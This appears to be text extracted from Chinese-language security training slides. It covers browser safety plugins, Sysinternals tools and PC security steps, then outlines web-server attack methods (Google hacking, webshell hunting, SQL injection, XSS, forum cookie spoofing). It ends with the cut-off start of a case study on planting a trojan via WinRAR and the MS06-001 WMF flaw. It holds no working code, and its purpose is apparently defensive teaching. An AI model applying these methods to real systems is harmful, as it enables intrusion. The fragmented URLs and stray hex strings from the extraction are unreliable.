43 公告被植入惡意程式的網站 Zone-h 台灣地區被駭大砲開講網站安全天罣 -- 淪陷網站資安之眼 -- TW 網站淪陷資料庫網頁瀏覽安全防護軟體功能 : 透過在個人端安裝瀏覽器外掛 (for IE & Firefox) 元件針對網頁上的內容, 提供你瀏覽網頁時的安全性建議 ( 諸如網頁釣魚廣告程式間諜軟體垃圾郵件等 ), 並且以顏色區分嚴重性 ( 綠黃灰紅 ); 此外當使用大型搜尋引擎 (Google Yahoo MSN) 時, 會直接在搜尋結果上以色塊來表示該網頁的安全性, 以達到防護的效果 43

44 TrendProtect 瀏覽器外掛程式官方下載處 : US/free_security_tools/trendprotect.php?page= download 警告燈號 : 良好不佳未知 McAfee SiteAdvisor 瀏覽器外掛程式官方下載處 : 警告燈號 : 良好不佳未知 44

com/taiwan/technet/s p// / / / ysinternals/default.mspx Process Explorer for Windows v10.21 http://www.microsoft.

45 二者比較 McAfee SiteAdvisor TrendProtect 支援瀏覽器 IE,Firefox IE,Firefox 介面語言中文英文警告燈號有有警示與阻擋有警示無阻擋有警示無阻擋網頁內容過濾有支援線上掃毒危險網站詳細資料使用者可加入評比網站安全性有有有常用工具 : 檔案偵測 ( 免費 ) Microsoft TechNet Windows Sysinternals p// / / / ysinternals/default.mspx Process Explorer for Windows v ysinternals/security/processexplorer.mspx AutoRuns for Windows v ysinternals/security/autoruns.mspx 45

46 電腦安全性的七大步驟 1. 評估使用電腦的風險, 隨時提高警覺不要亂點選 2. 使用防毒軟體及防間諜軟體, 並搭配線上掃毒 3. 保持更新作業系統及應用程式等軟體為最新狀態 4. 檢查您的作業系統及 IE 安全性設定 5. 使用個人 ( 單機 ) 防火牆 6. 建立穩固的密碼 7. 執行日常工作安全性維護, 例如 : 更新掃毒結論利用知名搜尋引擎尋找目標 Web Server 搜尋引擎的風險網站攻擊者思考基本進階其它語法與關鍵字搜尋存在漏洞的網站查找別人留下來的 Webshell 後門自動化 Google Hacks 工具如何防止 Google Hacks Web Server 入侵手法 Microsoft 漏洞利用網頁木馬 ( 原生型漏洞型 asp 或 php 網頁木馬 ) 論壇套件漏洞利用 (Cookie 欺騙論壇 DB 爆庫 %5c 路徑爆庫其它套件路徑暴露 ) 論壇套件漏洞利用 (Cookie 欺騙論壇 DB 爆庫 %5c 路徑爆庫其它套件路徑暴露 ) SQL Injection 利用 XSS 利用 Web Server 防禦策略網頁木馬流程阻擋點 46

47 問題與討論網路攻防戰部落格 BCCS 47

<4D F736F F F696E74202D A67EABD7A7F0A8BEA4E2AA6BBEE3B27AB1B4B0515FC1BFB8712E BACDBAE65BCD2A6A15D>

<4D F736F F F696E74202D A67EABD7A7F0A8BEA4E2AA6BBEE3B27AB1B4B0515FC1BFB8712E BACDBAE65BCD2A6A15D> 2008 年度年度攻防手法整理探討案例 : 利用 WINRAR 壓縮程式漏洞掛馬 1 入侵環境條件 : 具有 MS06-001 wmf 漏洞的電腦安裝 WINRAR 壓縮 / 解壓縮軟體手法探討 : 製造遠端遙控型木馬 ( 原生型木馬 ) 製造 MS06-001 漏洞工具撰寫呼叫 wmf 檔案的掛馬網址使用 WINRAR 製做具有 XSS 的自動解壓縮檔案被害人點選自動解壓縮檔案後植入